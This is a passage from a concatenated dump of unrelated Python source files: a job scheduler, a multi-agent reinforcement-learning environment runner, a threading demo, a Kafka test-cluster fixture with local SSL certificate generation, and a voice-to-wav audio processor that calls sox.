no effect on the job's execution.
"""
if self._label:
return self._label
if self._handler is not None and self._handler.__name__:
return self._handler.__name__
raise RuntimeError('Undefined job label')
def get_doc(self):
"""Get the job's documentation.
:rtype: str
A job's documentation is a short text that can be displayed to a user.
"""
return self._doc
def is_threaded(self):
"""Tell if the job's execution should be in a thread.
:return: ``True`` if the execution should be in a thread,
``False`` otherwise
:rtype: bool
"""
return self._threaded
def is_ready_to_run(self, at_time):
"""Check if this job is (or will be) ready to run at the given time.
:param int at_time: Timestamp to check, in seconds
:return: ``True`` if the job is (or will be) ready to run, ``False``
otherwise
:rtype: bool
"""
return not self.is_running.is_set() and any(
(next_time - at_time) <= 0
for next_time in self.next_times.values()
)
def next(self, current_time):
"""Update :attr:`next_times`, assuming it executed at ``current_time``.
:param int current_time: timestamp of the current time
:return: a modified job object
"""
for interval, last_time in list(self.next_times.items()):
if last_time >= current_time:
# no need to update this interval
continue
# if last time + interval is in the future, it's used
# else, try to run it asap
self.next_times[interval] = max(last_time + interval, current_time)
return self
def execute(self, manager):
"""Execute the job's handler and return its result.
:param object manager: used as argument to the job's handler
:return: the return value from the handler's execution
This method executes the job's handler. It doesn't change its running
state, as this must be done by the caller::
with job: # mark as running
# before execution
job.execute(manager)
# after execution
"""
return self._handler(manager)
|
envs_runner_cen_condi.py
|
import numpy as np
import torch
import IPython
from multiprocessing import Process, Pipe
from IPython.core.debugger import set_trace
def worker(child, env):
"""
Worker function which interacts with the environment over remote
"""
try:
while True:
# wait cmd sent by parent
cmd, data = child.recv()
if cmd == 'step':
actions, obs, reward, terminate, valid = env.step(data)
for idx, v in enumerate(valid):
accu_id_rewards[idx] = accu_id_rewards[idx] + reward[idx] if not last_id_valid[idx] else reward[idx]
last_id_valid = valid
accu_joint_rewards = accu_joint_rewards + sum(reward)/env.n_agent if not last_joint_valid else sum(reward)/env.n_agent
last_joint_valid = max(valid)
# sent experience back
child.send((last_obs,
actions,
accu_id_rewards,
accu_joint_rewards,
obs,
terminate,
valid,
max(valid)))
last_obs = obs
R += sum(reward)/env.n_agent
elif cmd == 'reset':
last_obs = env.reset()
last_h = None # single network for cen control
last_id_action = [-1] * env.n_agent
last_id_valid = [1] * env.n_agent
last_joint_valid = 1
accu_id_rewards = [0.0] * env.n_agent
accu_joint_rewards = 0.0
R = 0.0
child.send((last_obs, last_h, last_id_action, last_id_valid))
elif cmd == 'close':
child.close()
break
else:
raise NotImplementerError
except KeyboardInterrupt:
print('EnvRunner worker: caught keyboard interrupt')
except Exception as e:
print('EnvRunner worker: uncaught worker exception')
raise
class EnvsRunner(object):
"""
Environment runner which runs multiple environemnts in parallel in subprocesses
and communicates with them via pipe
"""
def __init__(self,
env,
memory,
n_env,
h_explore,
get_actions):
"""
Parameters
----------
env : gym.env
A macro-action-based gym envrionment.
memory : ReplayBuffer
An instance of RepalyBuffer class.
n_env : int
The number of envs running in parallel.
h_explore : bool
Whether use history-based policy for rollout.
get_actions : python function
A function for getting macro-actions
"""
# func for getting next action via current policy nn
self.get_actions = get_actions
# create connections via Pipe
self.parents, self.children = [list(i) for i in zip(*[Pipe() for _ in range(n_env)])]
# create multip processor with multiple envs
self.envs = [Process(target=worker, args=(child, env)) for child in self.children]
# replay buffer
self.memory = memory
self.hidden_states = [None] * env.n_agent
self.h_explore = h_explore
self.episodes = [[]] * n_env
# trigger each processor
for env in self.envs:
env.daemon = True
env.start()
for child in self.children:
child.close()
def step(self):
n_episode_done = 0
for idx, parent in enumerate(self.parents):
# get next action
if self.h_explore:
self.actions[idx], self.h_states[idx] = self.get_actions(self.last_obses[idx], self.h_states[idx], self.actions[idx], self.last_valids[idx])
else:
self.actions[idx], self.hidden_states[idx] = self.get_actions(self.last_obses[idx], self.h_states[idx], self.actions[idx], self.last_valids[idx])
# send cmd to trigger env step
parent.send(("step", self.actions[idx]))
# collect envs' returns
for idx, parent in enumerate(self.parents):
# env_return is (last_obs, a, acc_id_r, acc_j_r, obs, t, v)
env_return = parent.recv()
env_return = self.exp_to_tensor(env_return)
self.episodes[idx].append(env_return)
self.last_obses[idx] = env_return[4]
self.actions[idx] = env_return[1]
self.last_valids[idx] = env_return[6]
# if episode is done, add it to memory buffer
if env_return[-3]:
n_episode_done += 1
self.memory.scenario_cache += self.episodes[idx]
self.memory.flush_scenario_cache()
# when episode is done, immediately start a new one
parent.send(("reset", None))
self.last_obses[idx], self.h_states[idx], self.actions[idx], self.last_valids[idx] = parent.recv()
self.last_obses[idx] = self.obs_to_tensor(self.last_obses[idx])
self.actions[idx] = self.action_to_tensor(self.actions[idx])
self.last_valids[idx] = self.valid_to_tensor(self.last_valids[idx])
self.episodes[idx] = []
return n_episode_done
def reset(self):
# send cmd to reset envs
for parent in self.parents:
parent.send(("reset", None))
self.last_obses, self.h_states, self.actions, self.last_valids = [list(i) for i in zip(*[parent.recv() for parent in self.parents])]
self.last_obses = [self.obs_to_tensor(obs) for obs in self.last_obses]
self.actions = [self.action_to_tensor(a) for a in self.actions]
self.last_valids = [self.valid_to_tensor(id_v) for id_v in self.last_valids]
def close(self):
[parent.send(('close', None)) for parent in self.parents]
[parent.close() for parent in self.parents]
[env.terminate() for env in self.envs]
[env.join() for env in self.envs]
def obs_to_tensor(self, obs):
return [torch.from_numpy(o).float() for o in obs]
def valid_to_tensor(self,valid):
return [torch.tensor(v, dtype=torch.uint8).view(1,-1) for v in valid]
def action_to_tensor(self,action):
return [torch.tensor(a).view(1,1) for a in action]
def exp_to_tensor(self, exp):
last_obs = [torch.from_numpy(o).float() for o in exp[0]]
a = [torch.tensor(a).view(1,1) for a in exp[1]]
acc_id_r = [torch.tensor(r).float().view(1,-1) for r in exp[2]]
acc_joint_r = torch.tensor(exp[3]).float().view(1,-1)
obs = [torch.from_numpy(o).float() for o in exp[4]]
t = torch.tensor(exp[5]).float().view(1,-1)
id_v = [torch.tensor(v, dtype=torch.uint8).view(1,-1) for v in exp[6]]
joint_v = torch.tensor(exp[7], dtype=torch.uint8).view(1,-1)
return (last_obs, a, acc_id_r, acc_joint_r, obs, t, id_v, joint_v)
|
01_demo.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import threading
from time import sleep, ctime
def sing():
for i in range(3):
print("正在唱歌...%d" % i)
sleep(1)
def dance():
for i in range(3):
print("正在跳舞...%d" % i)
sleep(1)
if __name__ == '__main__':
print('---开始---:%s' % ctime())
t1 = threading.Thread(target=sing)
t2 = threading.Thread(target=dance)
t1.start()
t2.start()
# sleep(5) # 屏蔽此⾏代码, 试试看, 程序是否会⽴⻢结束?
# print('---结束---:%s' % ctime())
while True:
length = len(threading.enumerate())
print('当前运⾏的线程数为: %d' % length)
if length <= 1:
break
sleep(0.5)
|
cluster.py
|
import asyncio
import shutil
import tempfile
import threading
import warnings
from asyncio import AbstractEventLoop
from collections import Counter
from pathlib import Path
from typing import List, Optional, Union
from cluster_fixture import ssl_helper
from cluster_fixture.base import DEFAULT_KAFKA_VERSION, KafkaVersion, get_loop
from cluster_fixture.kafka import Endpoint, KafkaInstance, PlaintextEndpoint, SaslMechanism
from cluster_fixture.zookeeper import ZookeeperInstance
class ConfigurationWarning(UserWarning):
pass
class Cluster:
def __init__(
self,
cluster_id: int = 1,
cluster_size: int = 1,
kafka_version: KafkaVersion = DEFAULT_KAFKA_VERSION,
working_directory: Optional[Path] = None,
endpoints: Optional[List[Endpoint]] = None,
sasl_mechanisms: Optional[List[SaslMechanism]] = None,
keep_temporary_files: bool = False,
ssl_client_auth_enabled: bool = False,
):
"""
This class will create and manage all resources required to start up and monitor a Kafka cluster.
>>> from cluster_fixture import Cluster
>>> with Cluster() as cluster:
... print(cluster.get_bootstrap_servers("PLAINTEXT"))
['PLAINTEXT://localhost:9092']
:param cluster_id: Used for naming the control thread and working directory for this cluster.
:param cluster_size: Used to set how many brokers should be started.
:param kafka_version: The kafka version the brokers should use.
:param working_directory: The working directory containing all configuration files for Kafka and Zookeeper.
Defaults to a temporary directory if `None`.
:param endpoints: The list of get_endpoints each broker within the cluster should have. Can all use the same
ports, free ports will be determined during startup. Defaults to just a single plaintext
endpoint if `None`. The first endpoint in the list will be used for inter-broker
communication.
:param sasl_mechanisms: The list of sasl mechanisms the broker shall support. Defaults to `["PLAIN"]` if `None`.
:param keep_temporary_files: Determines whether to keep or delete the working directory after shutdown.
:param ssl_client_auth_enabled: Determines if ssl endpoints require clients to have their own valid
certificates. Default is `False`.
"""
self._cluster_size = cluster_size
self._components: List[Union[ZookeeperInstance, KafkaInstance]] = []
self._exception: Optional[Exception] = None
self._kafka_version = kafka_version
self._keep_temporary_files = keep_temporary_files
self._sasl_mechanisms = sasl_mechanisms
self._shutdown = threading.Event()
self._thread: Optional[threading.Thread] = None
self.brokers: List[KafkaInstance] = []
self.cluster_id = cluster_id
self.shutdown_complete = threading.Event()
self.startup_complete = threading.Event()
self.zk_instance: Optional[ZookeeperInstance] = None
if working_directory is None:
working_directory = Path(tempfile.mkdtemp(prefix="kafka_fixture_")) / f"cluster{cluster_id:02}"
self._working_directory = working_directory
self._working_directory.mkdir(parents=True, exist_ok=True)
if endpoints is None:
endpoints = [PlaintextEndpoint()]
self._endpoints: List[Endpoint] = endpoints
# make sure _endpoint names are unique
count = Counter(ep.listener_name for ep in self._endpoints)
duplicates = [key for key, value in count.items() if value > 1]
if duplicates:
raise ValueError(
"Listener names must be unique, the following listeners are defined more than once: "
+ ", ".join(duplicates)
)
# make sure endpoints don't use same ports
if len({ep.port for ep in self._endpoints}) != len(self._endpoints):
first_port = self._endpoints[0].port
self._endpoints = [ep.with_port(first_port + i) for i, ep in enumerate(self._endpoints)]
self._ssl_enabled: bool = any(ep.ssl_enabled for ep in self._endpoints)
self._ssl_client_auth_enabled: bool = ssl_client_auth_enabled
self._ssl_keystore_location: Optional[Path] = None
self._ssl_cert_location: Optional[Path] = None
self._ssl_key_location: Optional[Path] = None
self._ssl_store_passphrase: str = "hunter2"
if self._ssl_enabled:
self._generate_certificates()
if self._ssl_client_auth_enabled and not self._ssl_enabled:
warnings.warn("Client auth enabled, but no SSL endpoint configured!", ConfigurationWarning)
def _generate_certificates(self):
# Since both client and server are on localhost, we can just use the same certificates for everything
keystore = ssl_helper.cert_gen()
self._ssl_keystore_location = self._working_directory / "keystore.pkcs12"
ssl_helper.dump_keystore(self._ssl_keystore_location, keystore, self._ssl_store_passphrase)
self._ssl_key_location = self._working_directory / "server_key.pem"
self._ssl_cert_location = self._working_directory / "server_cert.pem"
ssl_helper.dump_cert_data(self._ssl_key_location, self._ssl_cert_location, keystore)
@property
def ssl_enabled(self) -> bool:
return self._ssl_enabled
@property
def ssl_client_auth_enabled(self) -> bool:
return self._ssl_client_auth_enabled
@property
def ssl_store_passphrase(self) -> str:
return self._ssl_store_passphrase
@property
def ssl_server_cert_location(self) -> Path:
if self._ssl_cert_location is None:
raise RuntimeError("Server certificate hasn't been generated! Did you configure an SSL endpoint?")
return self._ssl_cert_location
@property
def ssl_server_keystore_location(self) -> Path:
if self._ssl_keystore_location is None:
raise RuntimeError("Server keystore hasn't been generated! Did you configure an SSL endpoint?")
return self._ssl_keystore_location
@property
def ssl_server_truststore_location(self) -> Path:
if self._ssl_keystore_location is None:
raise RuntimeError("Server truststore hasn't been generated! Did you configure an SSL endpoint?")
return self._ssl_keystore_location
@property
def ssl_client_keystore_location(self) -> Path:
if self._ssl_keystore_location is None:
raise RuntimeError("Client keystore hasn't been generated! Did you configure an SSL endpoint?")
return self._ssl_keystore_location
@property
def ssl_client_truststore_location(self) -> Path:
if self._ssl_keystore_location is None:
raise RuntimeError("Client truststore hasn't been generated! Did you configure an SSL endpoint?")
return self._ssl_keystore_location
@property
def ssl_client_key_location(self) -> Path:
if self._ssl_key_location is None:
raise RuntimeError("Client key hasn't been generated! Did you configure an SSL endpoint?")
return self._ssl_key_location
@property
def ssl_client_cert_location(self) -> Path:
if self._ssl_cert_location is None:
raise RuntimeError("Client cert hasn't been generated! Did you configure an SSL endpoint?")
return self._ssl_cert_location
def start(self) -> None:
"""
Start the cluster after it has been created or stopped.
If this cluster is used as a contextmanager, this function will automatically be called.
When restarting a stopped cluster, the ports are only guaranteed to stay the same if nothing
else has bound to them in the meantime.
>>> cluster = Cluster()
>>> try:
... cluster.start()
... print(cluster.get_bootstrap_servers("PLAINTEXT"))
... finally:
... cluster.stop()
['PLAINTEXT://localhost:9092']
>>> # try-finally construct omitted here for brevity.
>>> cluster.start()
>>> print(cluster.get_bootstrap_servers("PLAINTEXT"))
['PLAINTEXT://localhost:9092']
>>> cluster.close()
:raises RuntimeError: When called on a cluster that is running.
"""
self.start_nowait()
self.startup_complete.wait(timeout=300)
if self._exception:
raise self._exception
def start_nowait(self) -> None:
"""
Non-blocking version of :meth:`start`. Use :attr:`startup_complete` to determine if the cluster has completed
startup.
"""
if self._thread is not None:
raise RuntimeError("Cluster already running or not properly closed!")
self.startup_complete.clear()
self.shutdown_complete.clear()
self._shutdown.clear()
self._components.clear()
self.brokers.clear()
self.zk_instance = None
self._exception = None
self._thread = threading.Thread(name=f"Cluster{self.cluster_id:02}EventLoop", target=self._run)
self._thread.start()
def _run(self) -> None:
loop: Optional[AbstractEventLoop] = None
try:
loop = get_loop()
self.zk_instance = ZookeeperInstance(
kafka_version=self._kafka_version, working_directory=self._working_directory / "zookeeper", loop=loop
)
self.brokers.extend(
KafkaInstance(
cluster=self,
broker_id=broker_id,
zookeeper_instance=self.zk_instance,
cluster_size=self._cluster_size,
kafka_version=self._kafka_version,
working_directory=self._working_directory / f"broker{broker_id:02}",
loop=loop,
endpoints=self._endpoints,
sasl_mechanisms=self._sasl_mechanisms,
)
for broker_id in range(self._cluster_size)
)
self._components.extend(self.brokers)
self._components.append(self.zk_instance)
all_done = asyncio.gather(*(comp.start_async() for comp in self._components), return_exceptions=True)
results = loop.run_until_complete(all_done)
for result in results:
if isinstance(result, Exception):
self._exception = result
self._shutdown.set()
break
self.startup_complete.set()
loop.run_until_complete(self._check_shutdown())
except Exception as e:
self._exception = e
self._shutdown.set()
self.startup_complete.set()
finally:
if loop is not None:
loop.close()
async def _check_shutdown(self) -> None:
while not self._shutdown.is_set():
await asyncio.sleep(0.1)
results = await asyncio.gather(*(comp.close_async() for comp in self._components), return_exceptions=True)
for result in results:
if isinstance(result, Exception):
self._exception = result
break
self.shutdown_complete.set()
def stop(self) -> None:
"""
Stop a running cluster, does nothing if the cluster is inactive.
See :meth:`start` for usage example.
"""
if self._thread is None:
# got stopped before it even started, nothing to do
return
self._shutdown.set()
self._thread.join()
self._thread = None
if self._exception:
exc = self._exception
self._exception = None
raise exc
def close(self) -> None:
"""
Close the cluster. Basically does the same as :meth:`stop` but will also remove the working directory if
requested.
"""
self.stop()
if not self._keep_temporary_files and self._working_directory.exists():
shutil.rmtree(self._working_directory)
def get_bootstrap_servers(self, listener_name: str = "PLAINTEXT") -> List[str]:
"""
Retrieve the first **up to three** endpoint urls for the given `listener_name`.
Keep in mind that this is not necessarily the same as the security protocol.
For more information about `security_protocol` vs `listener_name` see :class:`Endpoint`.
:param listener_name: The name of the get_endpoints which shall be retrieved.
:return: A list of endpoint urls in the form `security_protocol://host:port`
e.g. `["PLAINTEXT://localhost:9092"]`.
:raises RuntimeError: If the cluster is not running.
:raises KeyError: If there is no listener with the given name on one or more brokers.
"""
self.assert_running()
return [broker.get_endpoint_url(listener_name) for broker in self.brokers[:3]]
def get_endpoints(self, listener_name: str = "PLAINTEXT") -> List[Endpoint]:
"""
Retrieve all brokers' :class:`Endpoint` objects for the given `listener_name`.
Keep in mind that the `listener_name` is not necessarily the same as the security protocol.
For more information about `security_protocol` vs `listener_name` see :class:`Endpoint`.
:param listener_name: The name of the get_endpoints which shall be retrieved.
:return: A list of :class:`Endpoint` with the given `listener_name`.
:raises RuntimeError: If the cluster is not running.
:raises KeyError: If there is no listener with the given name on one or more brokers.
"""
self.assert_running()
return [broker.get_endpoint(listener_name) for broker in self.brokers]
@property
def zookeeper_url(self) -> str:
"""
Retrieve the url of the zookeeper instance that's running for this cluster.
:return: The zookeeper url in the form `host:port`, e.g. `"localhost:8081"`.
:raises RuntimeError: If the cluster is not running.
"""
self.assert_running()
assert self.zk_instance is not None
return self.zk_instance.url
def assert_running(self) -> None:
"""
Make sure the cluster is running.
:raises RuntimeError: If the cluster is not running.
"""
if self._thread is None:
raise RuntimeError("Cluster hasn't been started yet!")
if not self.startup_complete.is_set():
raise RuntimeError("Cluster startup is not complete!")
if self.shutdown_complete.is_set():
raise RuntimeError("Cluster is shut down!")
if not self._thread.is_alive():
raise RuntimeError("Cluster thread has died!")
def __enter__(self) -> "Cluster":
self.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
|
_v5_proc_voice2wav.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# COPYRIGHT (C) 2014-2020 Mitsuo KONDOU.
# This software is released under the MIT License.
# https://github.com/konsan1101
# Thank you for keeping the rules.
import sys
import os
import time
import datetime
import codecs
import glob
import queue
import threading
import subprocess
# インターフェース
qCtrl_control_speech = 'temp/control_speech.txt'
# qLog,qFunc 共通ルーチン
import _v5__qLog
qLog = _v5__qLog.qLog_class()
import _v5__qFunc
qFunc = _v5__qFunc.qFunc_class()
qPLATFORM = qFunc.getValue('qPLATFORM' )
qRUNATTR = qFunc.getValue('qRUNATTR' )
qHOSTNAME = qFunc.getValue('qHOSTNAME' )
qUSERNAME = qFunc.getValue('qUSERNAME' )
qPath_pictures = qFunc.getValue('qPath_pictures' )
qPath_videos = qFunc.getValue('qPath_videos' )
qPath_cache = qFunc.getValue('qPath_cache' )
qPath_sounds = qFunc.getValue('qPath_sounds' )
qPath_icons = qFunc.getValue('qPath_icons' )
qPath_fonts = qFunc.getValue('qPath_fonts' )
qPath_log = qFunc.getValue('qPath_log' )
qPath_work = qFunc.getValue('qPath_work' )
qPath_rec = qFunc.getValue('qPath_rec' )
qPath_s_ctrl = qFunc.getValue('qPath_s_ctrl' )
qPath_s_inp = qFunc.getValue('qPath_s_inp' )
qPath_s_wav = qFunc.getValue('qPath_s_wav' )
qPath_s_jul = qFunc.getValue('qPath_s_jul' )
qPath_s_STT = qFunc.getValue('qPath_s_STT' )
qPath_s_TTS = qFunc.getValue('qPath_s_TTS' )
qPath_s_TRA = qFunc.getValue('qPath_s_TRA' )
qPath_s_play = qFunc.getValue('qPath_s_play' )
qPath_v_ctrl = qFunc.getValue('qPath_v_ctrl' )
qPath_v_inp = qFunc.getValue('qPath_v_inp' )
qPath_v_jpg = qFunc.getValue('qPath_v_jpg' )
qPath_v_detect = qFunc.getValue('qPath_v_detect' )
qPath_v_cv = qFunc.getValue('qPath_v_cv' )
qPath_v_photo = qFunc.getValue('qPath_v_photo' )
qPath_v_msg = qFunc.getValue('qPath_v_msg' )
qPath_d_ctrl = qFunc.getValue('qPath_d_ctrl' )
qPath_d_play = qFunc.getValue('qPath_d_play' )
qPath_d_prtscn = qFunc.getValue('qPath_d_prtscn' )
qPath_d_movie = qFunc.getValue('qPath_d_movie' )
qPath_d_upload = qFunc.getValue('qPath_d_upload' )
qBusy_dev_cpu = qFunc.getValue('qBusy_dev_cpu' )
qBusy_dev_com = qFunc.getValue('qBusy_dev_com' )
qBusy_dev_mic = qFunc.getValue('qBusy_dev_mic' )
qBusy_dev_spk = qFunc.getValue('qBusy_dev_spk' )
qBusy_dev_cam = qFunc.getValue('qBusy_dev_cam' )
qBusy_dev_dsp = qFunc.getValue('qBusy_dev_dsp' )
qBusy_dev_scn = qFunc.getValue('qBusy_dev_scn' )
qBusy_s_ctrl = qFunc.getValue('qBusy_s_ctrl' )
qBusy_s_inp = qFunc.getValue('qBusy_s_inp' )
qBusy_s_wav = qFunc.getValue('qBusy_s_wav' )
qBusy_s_STT = qFunc.getValue('qBusy_s_STT' )
qBusy_s_TTS = qFunc.getValue('qBusy_s_TTS' )
qBusy_s_TRA = qFunc.getValue('qBusy_s_TRA' )
qBusy_s_play = qFunc.getValue('qBusy_s_play' )
qBusy_v_ctrl = qFunc.getValue('qBusy_v_ctrl' )
qBusy_v_inp = qFunc.getValue('qBusy_v_inp' )
qBusy_v_QR = qFunc.getValue('qBusy_v_QR' )
qBusy_v_jpg = qFunc.getValue('qBusy_v_jpg' )
qBusy_v_CV = qFunc.getValue('qBusy_v_CV' )
qBusy_d_ctrl = qFunc.getValue('qBusy_d_ctrl' )
qBusy_d_inp = qFunc.getValue('qBusy_d_inp' )
qBusy_d_QR = qFunc.getValue('qBusy_d_QR' )
qBusy_d_rec = qFunc.getValue('qBusy_d_rec' )
qBusy_d_play = qFunc.getValue('qBusy_d_play' )
qBusy_d_browser = qFunc.getValue('qBusy_d_browser')
qBusy_d_upload = qFunc.getValue('qBusy_d_upload' )
qRdy__s_force = qFunc.getValue('qRdy__s_force' )
qRdy__s_fproc = qFunc.getValue('qRdy__s_fproc' )
qRdy__s_sendkey = qFunc.getValue('qRdy__s_sendkey')
qRdy__v_reader = qFunc.getValue('qRdy__v_reader' )
qRdy__v_sendkey = qFunc.getValue('qRdy__v_sendkey')
qRdy__d_reader = qFunc.getValue('qRdy__d_reader' )
qRdy__d_sendkey = qFunc.getValue('qRdy__d_sendkey')
class proc_voice2wav:
def __init__(self, name='thread', id='0', runMode='debug',
micDev='0', micType='bluetooth', micGuide='on', micLevel='777', ):
self.path = qPath_s_inp
self.runMode = runMode
self.micDev = micDev
self.micType = micType
self.micGuide = micGuide
self.micLevel = micLevel
self.minSize = 10000
self.maxSize = 384000
self.breakFlag = threading.Event()
self.breakFlag.clear()
self.name = name
self.id = id
self.proc_id = '{0:10s}'.format(name).replace(' ', '_')
self.proc_id = self.proc_id[:-2] + '_' + str(id)
if (runMode == 'debug'):
self.logDisp = True
else:
self.logDisp = False
qLog.log('info', self.proc_id, 'init', display=self.logDisp, )
self.proc_s = None
self.proc_r = None
self.proc_main = None
self.proc_beat = None
self.proc_last = None
self.proc_step = '0'
self.proc_seq = 0
def __del__(self, ):
qLog.log('info', self.proc_id, 'bye!', display=self.logDisp, )
def begin(self, ):
#qLog.log('info', self.proc_id, 'start')
self.fileRun = qPath_work + self.proc_id + '.run'
self.fileRdy = qPath_work + self.proc_id + '.rdy'
self.fileBsy = qPath_work + self.proc_id + '.bsy'
qFunc.statusSet(self.fileRun, False)
qFunc.statusSet(self.fileRdy, False)
qFunc.statusSet(self.fileBsy, False)
self.proc_s = queue.Queue()
self.proc_r = queue.Queue()
self.proc_main = threading.Thread(target=self.main_proc, args=(self.proc_s, self.proc_r, ))
self.proc_beat = time.time()
self.proc_last = time.time()
self.proc_step = '0'
self.proc_seq = 0
self.proc_main.setDaemon(True)
self.proc_main.start()
def abort(self, waitMax=5, ):
qLog.log('info', self.proc_id, 'stop', display=self.logDisp, )
self.breakFlag.set()
chktime = time.time()
while (not self.proc_beat is None) and ((time.time() - chktime) < waitMax):
time.sleep(0.25)
chktime = time.time()
while (os.path.exists(self.fileRun)) and ((time.time() - chktime) < waitMax):
time.sleep(0.25)
def put(self, data, ):
self.proc_s.put(data)
return True
def checkGet(self, waitMax=5, ):
chktime = time.time()
while (self.proc_r.qsize() == 0) and ((time.time() - chktime) < waitMax):
time.sleep(0.10)
data = self.get()
return data
def get(self, ):
if (self.proc_r.qsize() == 0):
return ['', '']
data = self.proc_r.get()
self.proc_r.task_done()
return data
def main_proc(self, cn_r, cn_s, ):
# ログ
qLog.log('info', self.proc_id, 'start', display=self.logDisp, )
qFunc.statusSet(self.fileRun, True)
self.proc_beat = time.time()
# 初期設定
self.proc_step = '1'
# 待機ループ
self.proc_step = '5'
check_file = ''
check_size = 0
check_time = time.time()
while (self.proc_step == '5'):
self.proc_beat = time.time()
# 停止要求確認
if (self.breakFlag.is_set()):
self.breakFlag.clear()
self.proc_step = '9'
break
# キュー取得
if (cn_r.qsize() > 0):
cn_r_get = cn_r.get()
inp_name = cn_r_get[0]
inp_value = cn_r_get[1]
cn_r.task_done()
else:
inp_name = ''
inp_value = ''
if (cn_r.qsize() > 1) or (cn_s.qsize() > 20):
qLog.log('warning', self.proc_id, 'queue overflow warning!, ' + str(cn_r.qsize()) + ', ' + str(cn_s.qsize()))
# レディ設定
if (qFunc.statusCheck(self.fileRdy) == False):
qFunc.statusSet(self.fileRdy, True)
# ステータス応答
if (inp_name.lower() == '_status_'):
out_name = inp_name
out_value = '_ready_'
cn_s.put([out_name, out_value])
# 処理
path = self.path
path_files = glob.glob(path + '*')
if (len(path_files) > 0):
#try:
if (True):
base_byte = 0
file_count = 0
for f in path_files:
file_count += 1
# 停止要求確認
if (self.breakFlag.is_set()):
self.breakFlag.clear()
self.proc_step = '9'
break
proc_file = f.replace('\\', '/')
# 書込み途中チェック
if (os.name != 'nt'):
#if (len(path_files) == file_count):
# ファイルサイズ
proc_size = 0
try:
rb = open(proc_file, 'rb')
proc_size = sys.getsizeof(rb.read())
rb.close
rb = None
except Exception as e:
rb = None
# 変化?
if (proc_file != check_file) \
or (proc_size != check_size):
check_file = proc_file
check_size = proc_size
check_time = time.time()
break
else:
# 変化なしでn秒経過?
if ((time.time() - check_time)<0.75):
break
if (proc_file[-4:].lower() == '.wav' and proc_file[-8:].lower() != '.wrk.wav'):
f1 = proc_file
f2 = proc_file[:-4] + '.wrk.wav'
try:
os.rename(f1, f2)
proc_file = f2
except Exception as e:
pass
if (proc_file[-4:].lower() == '.mp3' and proc_file[-8:].lower() != '.wrk.mp3'):
f1 = proc_file
f2 = proc_file[:-4] + '.wrk.mp3'
try:
os.rename(f1, f2)
proc_file = f2
except Exception as e:
pass
if (proc_file[-8:].lower() == '.wrk.wav' or proc_file[-8:].lower() == '.wrk.mp3'):
f1 = proc_file
f2 = proc_file[:-8] + proc_file[-4:]
try:
os.rename(f1, f2)
proc_file = f2
except Exception as e:
pass
# 実行カウンタ
self.proc_last = time.time()
self.proc_seq += 1
if (self.proc_seq > 9999):
self.proc_seq = 1
seq4 = '{:04}'.format(self.proc_seq)
seq2 = '{:02}'.format(self.proc_seq)
proc_name = proc_file.replace(path, '')
proc_name = proc_name[:-4]
work_name = self.proc_id + '.' + seq2
work_file = qPath_work + work_name + '.wav'
if (os.path.exists(work_file)):
os.remove(work_file)
sox = subprocess.Popen(['sox', '-q', proc_file, '-r', '16000', '-b', '16', '-c', '1', work_file, ], \
stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
sox.wait()
sox.terminate()
sox = None
if (os.path.exists(work_file)):
if (self.micDev.isdigit()):
os.remove(proc_file)
# ログ
if (self.runMode == 'debug') or (not self.micDev.isdigit()):
qLog.log('info', self.proc_id, '' + proc_name + u' → ' + work_name, display=self.logDisp,)
# ビジー設定
if (qFunc.statusCheck(self.fileBsy) == False):
qFunc.statusSet(self.fileBsy, True)
if (str(self.id) == '0'):
qFunc.statusSet(qBusy_s_wav, True)
# ファイルサイズ
work_size = 0
try:
rb = open(work_file, 'rb')
work_size = sys.getsizeof(rb.read())
rb.close
rb = None
except Exception as e:
rb = None
# ファイル分割処理
self.proc_last = time.time()
self.sub_proc(seq4, proc_file, work_file, proc_name, work_size, base_byte, cn_s, )
if (not self.micDev.isdigit()):
base_byte += work_size - 44
time.sleep(1.00)
#except Exception as e:
# pass
# ビジー解除
qFunc.statusSet(self.fileBsy, False)
if (str(self.id) == '0'):
qFunc.statusSet(qBusy_s_wav, False)
# バッチ実行時は終了
if (not self.micDev.isdigit()):
break
# アイドリング
slow = False
if (qFunc.statusCheck(qBusy_dev_cpu) == True):
slow = True
elif (qFunc.statusCheck(qBusy_dev_mic) == True) \
and (qFunc.statusCheck(qRdy__s_force) == False) \
and (qFunc.statusCheck(qRdy__s_sendkey) == False):
slow = True
if (slow == True):
time.sleep(1.00)
else:
if (cn_r.qsize() == 0):
time.sleep(0.25)
else:
time.sleep(0.05)
# 終了処理
if (True):
# レディ解除
qFunc.statusSet(self.fileRdy, False)
# ビジー解除
qFunc.statusSet(self.fileBsy, False)
if (str(self.id) == '0'):
qFunc.statusSet(qBusy_s_wav, False)
# キュー削除
while (cn_r.qsize() > 0):
cn_r_get = cn_r.get()
cn_r.task_done()
while (cn_s.qsize() > 0):
cn_s_get = cn_s.get()
cn_s.task_done()
# ログ
qLog.log('info', self.proc_id, 'end', display=self.logDisp, )
qFunc.statusSet(self.fileRun, False)
self.proc_beat = None
def sub_proc(self, seq4, proc_file, work_file, proc_name, work_size, base_byte, cn_s, ):
path = qPath_s_wav
nowTime = datetime.datetime.now()
stamp = nowTime.strftime('%Y%m%d.%H%M%S')
if (work_size >= int(self.minSize) and work_size <= int(self.maxSize+2000)):
if (self.micDev.isdigit()):
sec=int((work_size-44)/2/16000)
else:
sec=int(base_byte/2/16000)
hh = int(sec/3600)
mm = int((sec-hh*3600)/60)
ss = int(sec-hh*3600-mm*60)
tm = '{:02}{:02}{:02}'.format(hh,mm,ss)
fwork = path + stamp + '.' + proc_name + '(000).' + tm + '.wav'
fjuli = qPath_s_jul + stamp + '.' + proc_name + '(000).' + tm + '.wav'
frec = qPath_rec + stamp + '.' + proc_name + '(000).' + tm + '.mp3'
try:
qFunc.copy(work_file, fwork)
qFunc.copy(work_file, fjuli)
if (self.micDev.isdigit()):
sox = subprocess.Popen(['sox', '-q', work_file, '-r', '16000', '-b', '16', '-c', '1', frec, ], \
stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
sox.wait()
sox.terminate()
sox = None
# 結果出力
if (cn_s.qsize() < 99):
out_name = 'filename'
out_value = fjuli
cn_s.put([out_name, out_value])
except Exception as e:
pass
if (work_size > int(self.maxSize+2000)):
sep_sec = int(self.maxSize/2/16000 - 1)
nn = 1
while (nn != 0):
ftrim = work_file[:-4] + '.trim.wav'
